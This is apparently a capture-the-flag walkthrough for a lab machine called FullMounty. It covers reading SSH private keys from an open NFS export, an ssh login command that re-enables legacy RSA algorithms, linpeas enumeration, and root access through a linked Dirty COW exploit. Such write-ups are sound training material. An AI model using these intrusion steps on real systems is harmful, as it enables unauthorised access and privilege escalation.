FullMounty

Nmap Scan Result

We have nfs service running on port 2049. With showmount, I an able to see what drive is mounted as seen below.

Mounted the /srv/exportnfs drive to my local machine /tmp folder. As seen, we have access to SSH private and public keys whict we can just cat out or copy with cp.

From the below, we can see that the username of the created key is deadbeef so we can use this when doing SSH login

...but we run into another issue with ssh regards ssh host key but we can kix this with the HostKeyAlgorithms  option

ssh deadbeef@10.150.150.134 -i id_rsa -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedAlgorithms=+ssh-rsa 

remember to change the private key permission to more secure option  (chmod 600 id_rsa)

Copy linpeas.sh to target machine for privilege escalation

The Linux Kernel is 2.6.32 running on Ububtu Lucid (10.04 TLS), susceptible to Dirtycow Kernel exploits https://www.exploit-db.com/exploits/40839 

The target system doesn't have C compiler installed (gcc), so the best way to compile the exploit is to create a VM running the excact kernal version. Ubuntu Lucid can be downloaded from here.

run the dirtycow firefart exploit and you're required to enter the password for the firefart account.

Now running the exploit on our target PC.